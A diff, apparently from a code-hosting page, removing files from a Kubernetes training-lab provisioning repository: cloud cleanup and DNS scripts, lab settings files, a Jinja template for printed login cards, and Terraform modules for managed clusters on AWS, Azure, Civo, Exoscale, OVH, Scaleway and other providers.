`/usr/local/Cellar/python/3`-something. If it isn't, follow these
instructions.
1) Verify that Python 3 is installed.
```
ls -la /usr/local/Cellar/Python
```
You should see one or more versions of Python 3. If you don't,
install it with `brew install python`.
2) Verify that `python` points to Python3.
```
ls -la /usr/local/bin/python
```
If this points to `/usr/local/Cellar/python@2`, then we'll need to change it.
```
rm /usr/local/bin/python
ln -s /usr/local/Cellar/Python/xxxx /usr/local/bin/python
# where xxxx is the most recent Python 3 version you saw above
```
### AWS specific notes
Initial assumptions are you're using a root account. If you'd like to use a IAM user, it will need the right permissions. For `pssh` mode, that includes at least `AmazonEC2FullAccess` and `IAMReadOnlyAccess`.
In `pssh` mode, the Terraform configuration currently uses the default VPC and Security Group. If you want to use another one, you'll have to make changes to `terraform/virtual-machines/aws`.
The default VPC Security Group does not open any ports from Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`.

View File

@@ -1,33 +0,0 @@
#!/bin/sh
case "$1-$2" in
linode-lb)
linode-cli nodebalancers list --json |
jq '.[] | select(.label | startswith("ccm-")) | .id' |
xargs -n1 -P10 linode-cli nodebalancers delete
;;
linode-pvc)
linode-cli volumes list --json |
jq '.[] | select(.label | startswith("pvc")) | .id' |
xargs -n1 -P10 linode-cli volumes delete
;;
digitalocean-lb)
doctl compute load-balancer list --output json |
jq .[].id |
xargs -n1 -P10 doctl compute load-balancer delete --force
;;
digitalocean-pvc)
doctl compute volume list --output json |
jq '.[] | select(.name | startswith("pvc-")) | .id' |
xargs -n1 -P10 doctl compute volume delete --force
;;
scaleway-pvc)
scw instance volume list --output json |
jq '.[] | select(.name | contains("_pvc-")) | .id' |
xargs -n1 -P10 scw instance volume delete
;;
*)
echo "Unknown combination of provider ('$1') and resource ('$2')."
;;
esac

View File

@@ -1,59 +0,0 @@
#!/bin/sh
#set -eu
if ! command -v http >/dev/null; then
echo "Could not find the 'http' command line tool."
echo "Please install it (the package name might be 'httpie')."
exit 1
fi
. ~/creds/creds.cloudflare.dns
cloudflare() {
case "$1" in
GET|POST|DELETE)
METHOD="$1"
shift
;;
*)
METHOD=""
;;
esac
URI=$1
shift
http --ignore-stdin $METHOD https://api.cloudflare.com/client/v4/$URI "$@" "Authorization:Bearer $CLOUDFLARE_TOKEN"
}
_list_zones() {
cloudflare zones?per_page=100 | jq -r .result[].name
}
_get_zone_id() {
cloudflare zones?name=$1 | jq -r .result[0].id
}
_populate_zone() {
ZONE_ID=$(_get_zone_id $1)
shift
for IPADDR in $*; do
cloudflare zones/$ZONE_ID/dns_records "name=*" "type=A" "content=$IPADDR"
cloudflare zones/$ZONE_ID/dns_records "name=\@" "type=A" "content=$IPADDR"
done
}
_clear_zone() {
ZONE_ID=$(_get_zone_id $1)
for RECORD_ID in $(
cloudflare zones/$ZONE_ID/dns_records | jq -r .result[].id
); do
cloudflare DELETE zones/$ZONE_ID/dns_records/$RECORD_ID
done
}
_add_zone() {
cloudflare zones "name=$1"
}
echo "This script is still work in progress."
echo "You can source it and then use its individual functions."

View File

@@ -1,43 +0,0 @@
#!/bin/sh
#
# Baseline resource usage per vcluster in our usecase:
# 500 MB RAM
# 10% CPU
# (See https://docs.google.com/document/d/1n0lwp6rQKQUIuo_A5LQ1dgCzrmjkDjmDtNj1Jn92UrI)
# PRO2-XS = 4 core, 16 gb
PROVIDER=scaleway
case "$PROVIDER" in
linode)
export TF_VAR_node_size=g6-standard-6
export TF_VAR_location=eu-west
;;
scaleway)
export TF_VAR_node_size=PRO2-XS
export TF_VAR_location=fr-par-2
;;
esac
./labctl create --mode mk8s --settings settings/konk.env --provider $PROVIDER --tag konk
# set kubeconfig file
export KUBECONFIG=~/kubeconfig
cp tags/konk/stage2/kubeconfig.101 $KUBECONFIG
# set external_ip labels
kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name} {.status.addresses[?(@.type=="ExternalIP")].address}{"\n"}{end}' |
while read node address; do
kubectl label node $node external_ip=$address
done
# vcluster all the things
./labctl create --settings settings/mk8s.env --provider vcluster --mode mk8s --students 50
# install prometheus stack because that's cool
helm upgrade --install --repo https://prometheus-community.github.io/helm-charts \
--namespace prom-system --create-namespace \
kube-prometheus-stack kube-prometheus-stack
# and also fix sysctl
kubectl apply -f ../k8s/sysctl.yaml --namespace kube-system

View File

@@ -1,7 +0,0 @@
version = 2
[plugins."io.containerd.grpc.v1.cri".containerd]
default_runtime_name = "runc"
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
runtime_type = "io.containerd.runc.v2"
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options]
SystemdCgroup = true

View File

@@ -1,16 +0,0 @@
#!/bin/sh
DOMAINS=domains.txt
IPS=ips.txt
. ./dns-cloudflare.sh
paste "$DOMAINS" "$IPS" | while read domain ips; do
if ! [ "$domain" ]; then
echo "⚠️ No more domains!"
exit 1
fi
_clear_zone "$domain"
_populate_zone "$domain" $ips
done
echo "✅ All done."

View File

@@ -1,21 +0,0 @@
CLUSTERSIZE=3
CLUSTERPREFIX=kubenet
CLUSTERNUMBER=100
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubebins
kubetools
ips
"

View File

@@ -1,21 +0,0 @@
CLUSTERSIZE=3
CLUSTERPREFIX=kuberouter
CLUSTERNUMBER=200
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubebins
kubetools
ips
"

View File

@@ -1,26 +0,0 @@
CLUSTERSIZE=1
CLUSTERPREFIX=monokube
# We're sticking to this in the first DMUC lab,
# because it still works with Docker, and doesn't
# require a ServiceAccount signing key.
KUBEVERSION=1.19.11
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
disabledocker
createuser
webssh
tailhist
kubebins
kubetools
ips
"

View File

@@ -1,25 +0,0 @@
CLUSTERSIZE=3
CLUSTERPREFIX=oldversion
USER_LOGIN=k8s
USER_PASSWORD=training
# For a list of old versions, check:
# https://kubernetes.io/releases/patch-releases/#non-active-branch-history
KUBEVERSION=1.28.9
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"

View File

@@ -1,20 +0,0 @@
CLUSTERSIZE=3
CLUSTERPREFIX=polykube
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
kubepkgs
kubebins
createuser
webssh
tailhist
kubetools
ips
"

View File

@@ -1,21 +0,0 @@
CLUSTERSIZE=3
CLUSTERPREFIX=test
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"

View File

@@ -1,19 +0,0 @@
CLUSTERSIZE=1
CLUSTERPREFIX=moby
USER_LOGIN=docker
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
cards
ips
"

View File

@@ -1,6 +0,0 @@
CLUSTERSIZE=5
USER_LOGIN=k8s
USER_PASSWORD=
STEPS="stage2"

View File

@@ -1,21 +0,0 @@
CLUSTERSIZE=4
CLUSTERPREFIX=node
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"

View File

@@ -1,22 +0,0 @@
CLUSTERSIZE=10
export TF_VAR_node_size=GP1.M
CLUSTERPREFIX=node
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"

View File

@@ -1,4 +0,0 @@
USER_LOGIN=k8s
USER_PASSWORD=
STEPS="stage2"

View File

@@ -1,21 +0,0 @@
#export TF_VAR_node_size=GP2.4
#export TF_VAR_node_size=g6-standard-6
#export TF_VAR_node_size=m7i.xlarge
CLUSTERSIZE=1
CLUSTERPREFIX=CHANGEME
USER_LOGIN=portal
USER_PASSWORD=CHANGEME
STEPS="
wait
standardize
clusterize
tools
docker
createuser
ips
"

View File

@@ -1,40 +0,0 @@
#!/bin/sh
set -e
PREFIX=$(date +%Y-%m-%d-%H-%M)
PROVIDER=openstack/enix # aws also works
STUDENTS=2
#export TF_VAR_location=eu-north-1
export TF_VAR_node_size=S
SETTINGS=admin-monokube
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \
--provider $PROVIDER \
--settings settings/$SETTINGS.env \
--students $STUDENTS
SETTINGS=admin-polykube
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \
--provider $PROVIDER \
--settings settings/$SETTINGS.env \
--students $STUDENTS
SETTINGS=admin-oldversion
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \
--provider $PROVIDER \
--settings settings/$SETTINGS.env \
--students $STUDENTS
SETTINGS=admin-test
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \
--provider $PROVIDER \
--settings settings/$SETTINGS.env \
--students $STUDENTS

View File

@@ -1 +0,0 @@
terraform/tags

View File

@@ -1,237 +0,0 @@
{#
The variables below can be customized here directly, or in your
settings.yaml file. Any variable in settings.yaml will be exposed
in here as well.
#}
{%- set url = url
| default("http://FIXME.container.training/") -%}
{%- set pagesize = pagesize
| default(10) -%}
{%- set lang = lang
| default("en") -%}
{%- set event = event
| default("training session") -%}
{%- set backside = backside
| default(False) -%}
{%- set image = image
| default(False) -%}
{%- set clusternumber = clusternumber
| default(None) -%}
{%- set thing = thing
| default("lab environment") -%}
{%- if lang == "en" -%}
{%- set intro -%}
Here is the connection information to your very own
{{ thing }} for this {{ event }}.
You can connect to it with any SSH client.
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
{{ thing }} pour cette formation.
Vous pouvez vous y connecter
avec n'importe quel client SSH.
{%- endset -%}
{%- endif -%}
{%- if lang == "en" -%}
{%- set slides_are_at -%}
You can find the slides at:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set slides_are_at -%}
Le support de formation est à l'adresse suivante :
{%- endset -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
{% if paper_size == "A4" %}
@page {
size: A4; /* Change from the default size of A4 */
margin: 0.5cm; /* Set margin on each page */
}
body {
/* this is A4 minus 0.5cm margins */
width: 20cm;
height: 28.7cm;
}
{% elif paper_size == "Letter" %}
@page {
size: Letter; /* 8.5in x 11in */
}
body {
width: 6.75in; /* two cards wide */
margin-left: 0.875in; /* (8.5in - 6.75in)/2 */
margin-top: 0; /* NOTE: we have to manually specify a top margin of e.g. 0.1875in when printing */
}
{% endif %}
body, table {
line-height: 1em;
font-size: 15px;
font-family: 'Slabo 27px';
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
td:first-child {
width: 10.5em;
}
div.card {
float: left;
border: 0.01in dotted black;
/*
columns * (width+left+right) < 100%
height: 33%;
width: 24.8%;
width: 33%;
*/
width: 3.355in; /* 3.375in minus two 0.01in borders */
height: 2.105in; /* 2.125in minus two 0.01in borders */
}
p {
margin: 0.8em;
}
div.front {
{% if image %}
background-image: url("{{ image }}");
background-repeat: no-repeat;
background-size: 1in;
background-position-x: 2.8in;
background-position-y: center;
{% endif %}
}
span.scale {
white-space: nowrap;
}
.qrcode img {
height: 5.8em;
padding: 1em 1em 0.5em 1em;
float: left;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 0;
}
</style>
<script type="text/javascript" src="qrcode.min.js"></script>
<script type="text/javascript">
function qrcodes() {
[].forEach.call(
document.getElementsByClassName("qrcode"),
(e, index) => {
new QRCode(e, {
text: "{{ qrcode }}",
correctLevel: QRCode.CorrectLevel.L
});
}
);
}
function scale() {
[].forEach.call(
document.getElementsByClassName("scale"),
(e, index) => {
var text_width = e.getBoundingClientRect().width;
var box_width = e.parentElement.getBoundingClientRect().width;
var percent = 100 * box_width / text_width + "%";
e.style.fontSize = percent;
}
);
}
</script>
</head>
<body onload="qrcodes(); scale();">
{% for login in logins %}
<div class="card front">
<p>{{ intro }}</p>
<p>
<table>
<tr>
<td>login:</td>
<td>password:</td>
</tr>
<tr>
<td class="logpass">{{ login.login }}</td>
<td class="logpass">{{ login.password }}</td>
</tr>
<tr>
<td>IP address:</td>
{% if login.port %}
<td>port:</td>
{% endif %}
</tr>
<tr>
<td class="logpass">{{ login.ipaddrs.split("\t")[0] }}</td>
{% if login.port %}
<td class="logpass">{{ login.port }}</td>
{% endif %}
</tr>
</table>
</p>
<p>
{% if url %}
{{ slides_are_at }}
<p>
<span class="scale">{{ url }}</span>
</p>
{% endif %}
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% if backside %}
{% for x in range(pagesize) %}
<div class="card back">
{{ backside }}
{#
<p>Thanks for attending
"Getting Started With Kubernetes and Container Orchestration"
during CONFERENCE in Month YYYY!</p>
<p>If you liked that workshop,
I can train your team, in person or
online, with custom courses of
any length and any level.
</p>
{% if qrcode %}
<p>If you're interested, please scan that QR code to contact me:</p>
<span class="qrcode"></span>
{% else %}
<p>If you're interested, you can contact me at:</p>
{% endif %}
<p>jerome.petazzoni@gmail.com</p>
#}
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endif %}
{% endfor %}
</body>
</html>

View File

@@ -1,18 +0,0 @@
cards_template: cards.html
paper_size: Letter
url: https://2024-11-qconsf.container.training
event: workshop
backside: |
<div class="qrcode"></div>
<p>
Thanks for attending the Asynchronous Architecture Patterns workshop at QCON!
</p>
<p>
If you'd like me to send you a copy of the recording of the workshop
and of the training materials,
please scan that QR code to leave me your
contact information. Thank you!
</p>
qrcode: https://2024-11-qconsf.container.training/q
thing: Kubernetes cluster
image: logo-bento.svg

View File

@@ -1,4 +0,0 @@
#!/bin/sh
az account list-locations -o table \
--query "sort_by([?metadata.regionType == 'Physical'], &regionalDisplayName)[]
.{ displayName: displayName, regionalDisplayName: regionalDisplayName }"

View File

@@ -1,2 +0,0 @@
#!/bin/sh
civo region ls

View File

@@ -1,2 +0,0 @@
#!/bin/sh
doctl compute region list

View File

@@ -1,2 +0,0 @@
#!/bin/sh
exo zone

View File

@@ -1,2 +0,0 @@
#!/bin/sh
gcloud compute zones list

View File

@@ -1,2 +0,0 @@
#!/bin/sh
linode-cli regions list

View File

@@ -1,2 +0,0 @@
#!/bin/sh
oci iam region list

View File

@@ -1,6 +0,0 @@
#!/bin/sh
echo "# Note that this is hard-coded in $0.
# I don't know if there is a way to list regions through the Scaleway API.
fr-par
nl-ams
pl-waw"

View File

@@ -1 +0,0 @@
one-kubernetes-config/config.tf

View File

@@ -1,3 +0,0 @@
This directory should contain a config.tf file, even if it's empty.
(Because if the file doesn't exist, then the Terraform configuration
in the parent directory will fail.)

View File

@@ -1,8 +0,0 @@
This directory should contain a copy of one of the "one-kubernetes" modules.
For instance, when located in this directory, you can do:
cp ../../one-kubernetes/linode/* .
Then, move the config.tf file to ../one-kubernetes-config:
mv config.tf ../one-kubernetes-config

View File

@@ -1 +0,0 @@
one-kubernetes-module/provider.tf

View File

@@ -1,3 +0,0 @@
terraform {
required_version = ">= 1.4"
}

View File

@@ -1,33 +0,0 @@
variable "tag" {
type = string
}
variable "how_many_clusters" {
type = number
default = 2
}
variable "min_nodes_per_cluster" {
type = number
default = 2
}
variable "max_nodes_per_cluster" {
type = number
default = 4
}
variable "node_size" {
type = string
default = "M"
}
variable "location" {
type = string
default = null
}
# TODO: perhaps handle if it's space-separated instead of newline?
locals {
locations = var.location == null ? [null] : split("\n", var.location)
}

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/aws/config.tf

View File

@@ -1,87 +0,0 @@
# Taken from:
# https://github.com/hashicorp/learn-terraform-provision-eks-cluster/blob/main/main.tf
data "aws_availability_zones" "available" {}
module "vpc" {
source = "terraform-aws-modules/vpc/aws"
version = "3.19.0"
name = var.cluster_name
cidr = "10.0.0.0/16"
azs = slice(data.aws_availability_zones.available.names, 0, 3)
private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
public_subnets = ["10.0.4.0/24", "10.0.5.0/24", "10.0.6.0/24"]
enable_nat_gateway = true
single_nat_gateway = true
enable_dns_hostnames = true
public_subnet_tags = {
"kubernetes.io/cluster/${var.cluster_name}" = "shared"
"kubernetes.io/role/elb" = 1
}
private_subnet_tags = {
"kubernetes.io/cluster/${var.cluster_name}" = "shared"
"kubernetes.io/role/internal-elb" = 1
}
}
module "eks" {
source = "terraform-aws-modules/eks/aws"
version = "19.5.1"
cluster_name = var.cluster_name
cluster_version = "1.24"
vpc_id = module.vpc.vpc_id
subnet_ids = module.vpc.private_subnets
cluster_endpoint_public_access = true
eks_managed_node_group_defaults = {
ami_type = "AL2_x86_64"
}
eks_managed_node_groups = {
one = {
name = "node-group-one"
instance_types = [local.node_size]
min_size = var.min_nodes_per_pool
max_size = var.max_nodes_per_pool
desired_size = var.min_nodes_per_pool
}
}
}
# https://aws.amazon.com/blogs/containers/amazon-ebs-csi-driver-is-now-generally-available-in-amazon-eks-add-ons/
data "aws_iam_policy" "ebs_csi_policy" {
arn = "arn:aws:iam::aws:policy/service-role/AmazonEBSCSIDriverPolicy"
}
module "irsa-ebs-csi" {
source = "terraform-aws-modules/iam/aws//modules/iam-assumable-role-with-oidc"
version = "4.7.0"
create_role = true
role_name = "AmazonEKSTFEBSCSIRole-${module.eks.cluster_name}"
provider_url = module.eks.oidc_provider
role_policy_arns = [data.aws_iam_policy.ebs_csi_policy.arn]
oidc_fully_qualified_subjects = ["system:serviceaccount:kube-system:ebs-csi-controller-sa"]
}
resource "aws_eks_addon" "ebs-csi" {
cluster_name = module.eks.cluster_name
addon_name = "aws-ebs-csi-driver"
addon_version = "v1.5.2-eksbuild.1"
service_account_role_arn = module.irsa-ebs-csi.iam_role_arn
tags = {
"eks_addon" = "ebs-csi"
"terraform" = "true"
}
}

View File

@@ -1,44 +0,0 @@
output "cluster_id" {
value = module.eks.cluster_arn
}
output "has_metrics_server" {
value = false
}
output "kubeconfig" {
sensitive = true
value = yamlencode({
apiVersion = "v1"
kind = "Config"
clusters = [{
name = var.cluster_name
cluster = {
certificate-authority-data = module.eks.cluster_certificate_authority_data
server = module.eks.cluster_endpoint
}
}]
contexts = [{
name = var.cluster_name
context = {
cluster = var.cluster_name
user = var.cluster_name
}
}]
users = [{
name = var.cluster_name
user = {
exec = {
apiVersion = "client.authentication.k8s.io/v1beta1"
command = "aws"
args = ["eks", "get-token", "--cluster-name", var.cluster_name]
}
}
}]
current-context = var.cluster_name
})
}
data "aws_eks_cluster_auth" "_" {
name = module.eks.cluster_name
}

View File

@@ -1,8 +0,0 @@
terraform {
required_providers {
aws = {
source = "hashicorp/aws"
version = "~> 4.47.0"
}
}
}

View File

@@ -1 +0,0 @@
../../providers/aws/variables.tf

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/azure/config.tf

View File

@@ -1,22 +0,0 @@
resource "azurerm_resource_group" "_" {
name = var.cluster_name
location = var.location
}
resource "azurerm_kubernetes_cluster" "_" {
name = var.cluster_name
location = var.location
dns_prefix = var.cluster_name
identity {
type = "SystemAssigned"
}
resource_group_name = azurerm_resource_group._.name
default_node_pool {
name = "x86"
node_count = var.min_nodes_per_pool
min_count = var.min_nodes_per_pool
max_count = var.max_nodes_per_pool
vm_size = local.node_size
enable_auto_scaling = true
}
}

View File

@@ -1,12 +0,0 @@
output "cluster_id" {
value = azurerm_kubernetes_cluster._.id
}
output "has_metrics_server" {
value = true
}
output "kubeconfig" {
value = azurerm_kubernetes_cluster._.kube_config_raw
sensitive = true
}

View File

@@ -1,7 +0,0 @@
terraform {
required_providers {
azurerm = {
source = "hashicorp/azurerm"
}
}
}

View File

@@ -1 +0,0 @@
../../providers/azure/variables.tf

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/civo/config.tf

View File

@@ -1,17 +0,0 @@
# As of March 2023, the default type ("k3s") only supports up
# to Kubernetes 1.23, which belongs to a museum.
# So let's use Talos, which supports up to 1.25.
resource "civo_kubernetes_cluster" "_" {
name = var.cluster_name
firewall_id = civo_firewall._.id
cluster_type = "talos"
pools {
size = local.node_size
node_count = var.min_nodes_per_pool
}
}
resource "civo_firewall" "_" {
name = var.cluster_name
}

View File

@@ -1,12 +0,0 @@
output "cluster_id" {
value = civo_kubernetes_cluster._.id
}
output "has_metrics_server" {
value = false
}
output "kubeconfig" {
value = civo_kubernetes_cluster._.kubeconfig
sensitive = true
}

View File

@@ -1,7 +0,0 @@
terraform {
required_providers {
civo = {
source = "civo/civo"
}
}
}

View File

@@ -1 +0,0 @@
../../providers/civo/variables.tf

View File

@@ -1,28 +0,0 @@
variable "cluster_name" {
type = string
default = "deployed-with-terraform"
}
variable "common_tags" {
type = list(string)
default = []
}
variable "node_size" {
type = string
default = "M"
}
variable "min_nodes_per_pool" {
type = number
default = 2
}
variable "max_nodes_per_pool" {
type = number
default = 4
}
locals {
node_size = lookup(var.node_sizes, var.node_size, var.node_size)
}

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/digitalocean/config.tf

View File

@@ -1 +0,0 @@
../../providers/digitalocean/variables.tf

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/exoscale/config.tf

View File

@@ -1,20 +0,0 @@
resource "exoscale_sks_cluster" "_" {
zone = var.location
name = var.cluster_name
service_level = "starter"
}
resource "exoscale_sks_nodepool" "_" {
cluster_id = exoscale_sks_cluster._.id
zone = exoscale_sks_cluster._.zone
name = var.cluster_name
instance_type = local.node_size
size = var.min_nodes_per_pool
}
resource "exoscale_sks_kubeconfig" "_" {
cluster_id = exoscale_sks_cluster._.id
zone = exoscale_sks_cluster._.zone
user = "kubernetes-admin"
groups = ["system:masters"]
}

View File

@@ -1,12 +0,0 @@
output "cluster_id" {
value = exoscale_sks_cluster._.id
}
output "has_metrics_server" {
value = true
}
output "kubeconfig" {
value = exoscale_sks_kubeconfig._.kubeconfig
sensitive = true
}

View File

@@ -1,7 +0,0 @@
terraform {
required_providers {
exoscale = {
source = "exoscale/exoscale"
}
}
}

View File

@@ -1 +0,0 @@
../../providers/exoscale/variables.tf

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/googlecloud/config.tf

View File

@@ -1,12 +0,0 @@
locals {
location = var.location != null ? var.location : "europe-north1-a"
region = replace(local.location, "/-[a-z]$/", "")
# Unfortunately, the following line doesn't work
# (that attribute just returns an empty string)
# so we have to hard-code the project name.
#project = data.google_client_config._.project
project = "prepare-tf"
}
data "google_client_config" "_" {}

View File

@@ -1 +0,0 @@
../../providers/googlecloud/variables.tf

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/linode/config.tf

View File

@@ -1 +0,0 @@
../../providers/linode/variables.tf

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/oci/config.tf

View File

@@ -1,7 +0,0 @@
terraform {
required_providers {
oci = {
source = "oracle/oci"
}
}
}

View File

@@ -1 +0,0 @@
../../providers/oci/variables.tf

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/ovh/config.tf

View File

@@ -1,18 +0,0 @@
resource "ovh_cloud_project_kube" "_" {
name = var.cluster_name
region = var.location
version = local.k8s_version
}
resource "ovh_cloud_project_kube_nodepool" "_" {
kube_id = ovh_cloud_project_kube._.id
name = "x86"
flavor_name = local.node_size
desired_nodes = var.min_nodes_per_pool
min_nodes = var.min_nodes_per_pool
max_nodes = var.max_nodes_per_pool
}
locals {
k8s_version = "1.26"
}

View File

@@ -1,12 +0,0 @@
output "cluster_id" {
value = ovh_cloud_project_kube._.id
}
output "has_metrics_server" {
value = false
}
output "kubeconfig" {
sensitive = true
value = ovh_cloud_project_kube._.kubeconfig
}

View File

@@ -1,7 +0,0 @@
terraform {
required_providers {
ovh = {
source = "ovh/ovh"
}
}
}

View File

@@ -1 +0,0 @@
../../providers/ovh/variables.tf

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/scaleway/config.tf

View File

@@ -1,42 +0,0 @@
resource "scaleway_vpc_private_network" "_" {
}
# This is a kind of hack to use a custom security group with Kapsulse.
# See https://www.scaleway.com/en/docs/containers/kubernetes/reference-content/secure-cluster-with-private-network/
resource "scaleway_instance_security_group" "_" {
name = "kubernetes ${split("/", scaleway_k8s_cluster._.id)[1]}"
inbound_default_policy = "accept"
outbound_default_policy = "accept"
}
resource "scaleway_k8s_cluster" "_" {
name = var.cluster_name
tags = var.common_tags
version = local.k8s_version
type = "kapsule"
cni = "cilium"
delete_additional_resources = true
private_network_id = scaleway_vpc_private_network._.id
}
resource "scaleway_k8s_pool" "_" {
cluster_id = scaleway_k8s_cluster._.id
name = "x86"
tags = var.common_tags
node_type = local.node_size
size = var.min_nodes_per_pool
min_size = var.min_nodes_per_pool
max_size = var.max_nodes_per_pool
autoscaling = var.max_nodes_per_pool > var.min_nodes_per_pool
autohealing = true
depends_on = [ scaleway_instance_security_group._ ]
}
data "scaleway_k8s_version" "_" {
name = "latest"
}
locals {
k8s_version = data.scaleway_k8s_version._.name
}

View File

@@ -1,12 +0,0 @@
output "cluster_id" {
value = scaleway_k8s_cluster._.id
}
output "has_metrics_server" {
value = sort([local.k8s_version, "1.22"])[0] == "1.22"
}
output "kubeconfig" {
sensitive = true
value = scaleway_k8s_cluster._.kubeconfig.0.config_file
}

View File

@@ -1 +0,0 @@
../../providers/scaleway/variables.tf

View File

@@ -1 +0,0 @@
../common.tf

Some files were not shown because too many files have changed in this diff Show More